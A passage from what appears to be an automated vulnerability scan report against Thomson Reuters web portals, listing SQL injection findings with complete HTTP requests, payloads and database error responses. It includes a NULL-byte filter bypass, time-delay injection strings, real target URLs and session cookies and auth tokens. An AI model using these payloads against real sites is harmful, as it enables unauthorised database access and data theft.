Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; s_cc=true; LangCode=en-US; LangId=1; IWICategory=IWICategory=; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%5D; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:46:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7472

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string '0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near '0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70'.</title>
...[SNIP]...

1.10. http://kbportal.thomson.com/display/2/login.aspx [cpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /display/2/login.aspx

Issue detail

The cpid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cpid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /display/2/login.aspx?cpid=21'&username=CSO&password=CSO&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&cid=21&t=&aid=&cat=&catURL=&r=0.754933476448059&searchstring=&searchtype= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; IWICategory=IWICategory=; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=store%3Asecure%3Aemptybasket; s_sq=%5B%5BB%5D%5D; s_ppv=100

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:32:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6451

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near ''.</title>
<style>
   body {font-family:"Verdana";font-weight:nor
...[SNIP]...

1.11. http://kbportal.thomson.com/display/2/login.aspx [password parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /display/2/login.aspx

Issue detail

The password parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the password parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /display/2/login.aspx?cpid=21&username=CSO&password=CSO%00'&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&cid=21&t=&aid=&cat=&catURL=&r=0.754933476448059&searchstring=&searchtype= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D; IWICategory=IWICategory=21; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:05:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7066

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title>
...[SNIP]...

1.12. http://kbportal.thomson.com/display/2/login.aspx [username parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /display/2/login.aspx

Issue detail

The username parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the username parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /display/2/login.aspx?cpid=21&username=CSO%00'&password=CSO&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&cid=21&t=&aid=&cat=&catURL=&r=0.754933476448059&searchstring=&searchtype= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D; IWICategory=IWICategory=21; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:05:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7066

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title>
...[SNIP]...

1.13. http://kbportal.thomson.com/index.aspx [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /index.aspx

Issue detail

The cid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /index.aspx?t=&article=&c=12&cid=21%00'&cpc=mCUbki05i2q2gM801Slr08SHaX285EO45&cat=&catURL= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; c_m2=1; c=undefined572000undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=49; s_cc=true; s_sq=; IWICategory=IWICategory=21

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:38:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6551

<html>
<head>
<title>ERROR [42S22] [Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name 'Lan_code'.</title>
<style>
   body {font-family:"Verdana";font-weig
...[SNIP]...

1.14. http://kbportal.thomson.com/index.aspx [cpc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /index.aspx

Issue detail

The cpc parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cpc parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /index.aspx?t=&article=&c=12&cid=21&cpc=mCUbki05i2q2gM801Slr08SHaX285EO45%00'&cat=&catURL= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; c_m2=1; c=undefined572000undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=49; s_cc=true; s_sq=; IWICategory=IWICategory=21

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:39:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7452

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'mCUbki05i2q2gM801Slr08SHaX285EO45'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'mCUbki05i2q2gM801Slr08SHaX285EO45'.</title>
...[SNIP]...

1.15. http://west.thomson.com/store/secure/ShoppingBasket.aspx [__EVENTARGUMENT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/secure/ShoppingBasket.aspx

Issue detail

The __EVENTARGUMENT parameter appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __EVENTARGUMENT parameter. The application took 25172 milliseconds to respond to the request, compared with 4165 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Cache-Control: max-age=0
Origin: http://west.thomson.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=6A6829A10F5C92DE0CB1A119F9EE9EF6D463C8109880169103407982A3E46BDA6007A83A750A0D7480CFBF9A4B336F598A9593B27BDF383E9B083872778FAE7427116C427965D43F446DD889D881919105B7BABAC309443C501C47C990B1FFBAD3DF2CD8A712CBAA4D004A8450CB24CD7F020D95A63CF1472A257CCF2C17CDA8155DFA41CDCA27029587B185FA669700FFE3BA8D00AC5CE2CDAD3362741F94A7661A44E56659A38DDF1D36FA12CD885EEBC70ECAE55EEC287DB28317FD5EB03835B147E06AFF9BBA3021901B500B3920BF0567C85F21F5C94E3276344508AE28349FDD59; s_cc=true; c=undefined571422undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shopping%20Cart; s_sq=thwest%3D%2526pid%253DShopping%252520Cart%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Btry%25257Bctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524btnProceedBottomHideSub%2526oidt%253D2%2526ot%253DIMAGE
Content-Length: 1139

__EVENTTARGET=ctl00%24placeHolderTopNavigation%24placeHolderContent%24btnProceedBottomsubmitButton&__EVENTARGUMENT=',0,0,0)waitfor%20delay'0%3a0%3a20'--&__VIEWSTATE=%2FwEPaA8FDzhjZGQyM2EzYjhjNDk4NxgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAU8Y3RsMDAkcGxhY2VIb2xkZXJUb3BOYXZpZ2F0aW9uJHBsYWNlSG9sZGVyQ29udGVudCRidG5Qcm9jZWVkBU1jdGwwMCRwbGFjZUhvbGRlc
...[SNIP]...

Response (redirected)

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 21:11:16 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: /Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26CartContents%3d22061301%253b%26PromCode%3d600582C43552%26PromType%3dinternal&CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 431

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26C
...[SNIP]...

1.16. http://west.thomson.com/store/secure/ShoppingBasket.aspx [_msuuid_787f8z6077 cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/secure/ShoppingBasket.aspx

Issue detail

The _msuuid_787f8z6077 cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the _msuuid_787f8z6077 cookie. The application took 52532 milliseconds to respond to the request, compared with 10937 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3',0)waitfor%20delay'0%3a0%3a20'--; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=A2B8589473CF8FC8B84582EDCCA18DA921C9607FD66A72923489A9D520F1A72DC25C5881F2C4299AFEC4F650329ED4D92FDB7810CCF374D8369FE4C447608C1AFF940455236DD8C534F6DDF5D9575CABE558EAEAC107A418E22F703D34308342D11D90AB828F7BFA1961EF59A3B04676FA38F27153203526720F64014AAF6FD2BDBA490CBE6FD194CC05A5B2612403A475A4ECE05807201D3CAEBB3AA82896D25B6F9D8910E1764008977756F0D348920ACDA8AA90BA295110ACD3D7783F9EE8463371CE85B2638990312C407C601E69F97C32BD90BA2EC5DFD202985E1A9741F53BA94F

Response (redirected)

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 21:03:06 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: /Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26CartContents%3d22061301%253b%26PromCode%3d600582C43552%26PromType%3dinternal&CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 431

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26C
...[SNIP]...

1.17. http://west.thomson.com/store/secure/ShoppingBasket.aspx [c cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/secure/ShoppingBasket.aspx

Issue detail

The c cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the c cookie. The application took 19936 milliseconds to respond to the request, compared with 2707 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /store/secure/ShoppingBasket.aspx?PromCode=571423 HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
